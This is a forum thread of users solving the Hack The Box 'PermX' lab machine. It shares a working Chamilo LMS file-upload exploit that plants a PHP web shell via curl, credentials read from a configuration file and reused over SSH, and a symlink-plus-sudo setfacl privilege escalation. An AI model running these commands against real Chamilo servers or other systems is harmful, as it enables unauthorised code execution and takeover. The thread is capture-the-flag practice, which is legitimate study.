Possibly Related Threads…

trevor69000 · Jul 06, 2024, 07:40 PM

https://app.hackthebox.com/machines/613
Lets go

peterpeter · Jul 06, 2024, 07:41 PM

https://starlabs.sg/advisories/23/23-3368/
Dont work, brute force user ¿?

trevor69000 · Jul 06, 2024, 07:43 PM

http://lms.permx.htb/app/config/parameters.yml.dist

parameters:

    database_driver: pdo_mysql

    database_host: 127.0.0.1

    database_port: ~

    database_name: chamilo111

    database_user: root

    database_password: root

    mailer_transport: smtp

    mailer_host: 127.0.0.1

    mailer_user: ~

    mailer_password: ~

    # A secret key that's used to generate certain security-related tokens

    secret: ThisTokenIsNotSoSecretChangeIt

    password_encryption: sha1

    # Activation for multi-url access

    multiple_access_urls: false

    # Deny the elimination of users

    deny_delete_users: false

    installed: ~

    password_encryption: sha1

    sp_bower_bin: '/usr/bin/bower'

    url_append: ''

    sonata_media.cdn.host: /uploads/media

    # If you installed Chamilo in http://localhost/chamilo_master

    # you need to setup like this:

    # url_append: '/chamilo_master/web/'

    # sonata_media.cdn.host: /chamilo_master/web/uploads/media

    sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;'

    locales: [en, fr, es, de]

osamy7593 · Jul 06, 2024, 07:54 PM

(Jul 06, 2024, 07:43 PM)trevor69000 Wrote: http://lms.permx.htb/app/config/parameters.yml.dist

parameters: database_driver: pdo_mysql database_host: 127.0.0.1 database_port: ~ database_name: chamilo111 database_user: root database_password: root mailer_transport: smtp mailer_host: 127.0.0.1 mailer_user: ~ mailer_password: ~ # A secret key that's used to generate certain security-related tokens secret: ThisTokenIsNotSoSecretChangeIt password_encryption: sha1 # Activation for multi-url access multiple_access_urls: false # Deny the elimination of users deny_delete_users: false installed: ~ password_encryption: sha1 sp_bower_bin: '/usr/bin/bower' url_append: '' sonata_media.cdn.host: /uploads/media # If you installed Chamilo in http://localhost/chamilo_master # you need to setup like this: # url_append: '/chamilo_master/web/' # sonata_media.cdn.host: /chamilo_master/web/uploads/media sonata_page.varnish.command: 'if [ ! -r "/etc/varnish/secret" ]; then echo "VALID ERROR :/"; else varnishadm -S /etc/varnish/secret -T 127.0.0.1:6082 {{ COMMAND }} "{{ EXPRESSION }}"; fi;' locales: [en, fr, es, de]

what that means

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

osamy7593 · Jul 06, 2024, 08:10 PM

(Jul 06, 2024, 07:58 PM)fuckhackthebox Wrote: https://starlabs.sg/advisories/23/23-4220/

$ echo '<?php system("id"); ?>' > rce.php $ curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' The file has successfully been uploaded. $ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php' uid=33(www-data) gid=33(www-data) groups=33(www-data)

bro how can u know that the parameter is action?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

osamy7593 · Jul 06, 2024, 08:13 PM

(Jul 06, 2024, 08:12 PM)fuckhackthebox Wrote:
(Jul 06, 2024, 08:10 PM)osamy7593 Wrote: bro how can u know that the parameter is action?

from the article i linked

its literally just a copy paste exploit i didnt change anything

$ cat /var/www/chamilo/app/config/configuration.php ... // Database connection settings. $_configuration['db_host'] = 'localhost'; $_configuration['db_port'] = '3306'; $_configuration['main_database'] = 'chamilo'; $_configuration['db_user'] = 'chamilo'; $_configuration['db_password'] = '03F6lY3uXAP2bkW8'; // Enable access to database management for platform admins. $_configuration['db_manager_enabled'] = false; ...

ssh in as mtz with that password to get user.txt

great man

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

ritualist · Jul 06, 2024, 08:30 PM

The sudo command seems like the obvious next step.

I tried creating a symlink

ln -s /root/root.txt root.txt

and then

sudo /opt/acl.sh mtz rwx /home/mtz/root.txt

But i get "Operation not permitted".

The root.txt gets regularly cleared so might be the right direction.

osamy7593 · Jul 06, 2024, 08:31 PM

why?

if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
mtz@permx:~$ sudo /opt/acl.sh mtz r /home/root/root.txt
sudo /opt/acl.sh mtz r /home/root/root.txt
Access denied.
mtz@permx:~$

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

osamy7593 · (This post was last modified: Jul 06, 2024, 08:44 PM by osamy7593.)

it tells the file is not writable

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

Abdo000 · Jul 06, 2024, 09:14 PM

(Jul 06, 2024, 08:51 PM)shadow_monarch Wrote: mtz@permx:~$ ln -s /root/root.txt root1.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root1.txt
setfacl: /home/mtz/root1.txt: Operation not permitted

why ??

just do it within 8 seconds then it'll work

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	25	2,507	6 hours ago Last Post: cry_elite
	CBBH Write Ups	hiddenhacker	25	6,560	6 hours ago Last Post: cry_elite
	[FREE] CPTS 12 FLAGS	pulsebreaker	84	2,907	6 hours ago Last Post: justhelpmefly
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	33	3,084	6 hours ago Last Post: justhelpmefly
	[FREE] HackTheBox Academy - CAPE Path Study	Techtom	44	4,424	6 hours ago Last Post: useryuserx